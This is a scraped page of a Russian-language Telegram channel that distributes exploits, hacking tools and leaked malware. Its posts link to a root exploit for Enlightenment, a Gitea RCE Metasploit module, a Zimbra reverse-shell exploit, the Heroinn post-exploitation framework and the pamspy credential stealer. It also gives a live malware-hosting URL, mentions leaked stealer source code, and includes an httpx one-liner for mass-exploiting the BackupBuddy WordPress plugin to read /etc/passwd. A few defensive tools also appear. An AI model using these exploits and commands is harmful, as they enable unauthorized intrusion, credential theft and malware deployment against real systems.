Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.29K photos
79 videos
664 files
1.33K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Зато у нас без пароля на архив 😜😜😜
Forwarded from Proxy Bar (private)
👍1
Приходите на ежегодный праздник имени Кобальта))
🔥24
WhatWeb
Next generation web scanner
Жирнющий сканер, комбайн
Из интересного: Over 1800 plugins и столько же разработчиков 😜
Читаем, качаем, испытываем

#scanner #security
👍15
Default Credentials Cheat Sheet
Большой список дефолтных логинов\паролей от железяк и всяких сервисов. Это бывает полезно
Забрать
😎
#password #default
👍14🔥1
А вот и 256 день в году. всех сопричастных с праздником !
😎
😱16🔥5👍1
Мы очень, очень рады, представить Вам ГЕРОИНН
Первый дозняк бесплатно !
так вот, Heroinn препарат кросс-платформенный и используется как post-exploitation framework
Прекурсором является RUST - который вызывает сильные привыкание (сильнее только python - запрещен в РФ)
В общем берем инсулинку, Варим и пробуем тут

#framework
👍15😱6🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
ZeroDay в оконном менеджере Enlightenment
привелегии до root
протестированно на ubuntu 22.04, в теории работает в любом дистре
Забрать готовый exploit

#exploit #linux #zeroday
👍10😱2
Ну ка быстро признались, чей RATник ?
hXXp://188.227.57.46/folder/
MSI
CORE
report

#malware
👍9😱6
На xss.is слили в сеть исходники Taurus/Predator The Thief
Тред\исходники

#malware
👍2
Malware development: persistence - part 1. Registry run keys. C++ example.
Read

#walware #windows
😱3👍1
Wordpress vuln\CVE
plugin: BackupBuddy
*
cat hosts |httpx -noscript -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"
*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
🔥8👍5
Злой Putty, корейская морковка, работа_мечты_Amazon.iso и троян AIRDRY.V2'
Не понятно ? тогда читаем расследование от bleepingcomputer.com
👍7
gitea_exploit_metasploit_module.rb
9.1 KB
Gitea - Remote Code Execution (for version 1.16.6)
CVE-2022-30781 - описание

#exploit
👍3😱2
CVE-2022-27925-zimbra_Revshell.zip
3.8 KB
Мы уже постили exploit для CVE-2022-27925 (zimbra)
Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
🔥6
админам на заметку:
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1

#windows #rdp
👍10
secretscanner.noscript
262.3 KB
SecretScanner
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download

#docker #security
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
pamspy - Воруем учетки в Linux используя eBPF
PAM модулями пользуются многие приложения для аутентификации (sudo, sshd, passwd и так далее), и статей по теме заBACKDOORивания PAM модулей в инете предостаточно.
*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию pam_get_authtok из libpam.so. И каждый раз когда условный пользователь пытается пройти аутентификацию он дергает pam_get_authtok - тут то pamspy выдернет пароль !
*
DOWNLOAD ——-> pamspy

#linux #pam
🔥2👍1
Cobalt Strike: и его payloads
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read

#cobaltstrike
👍1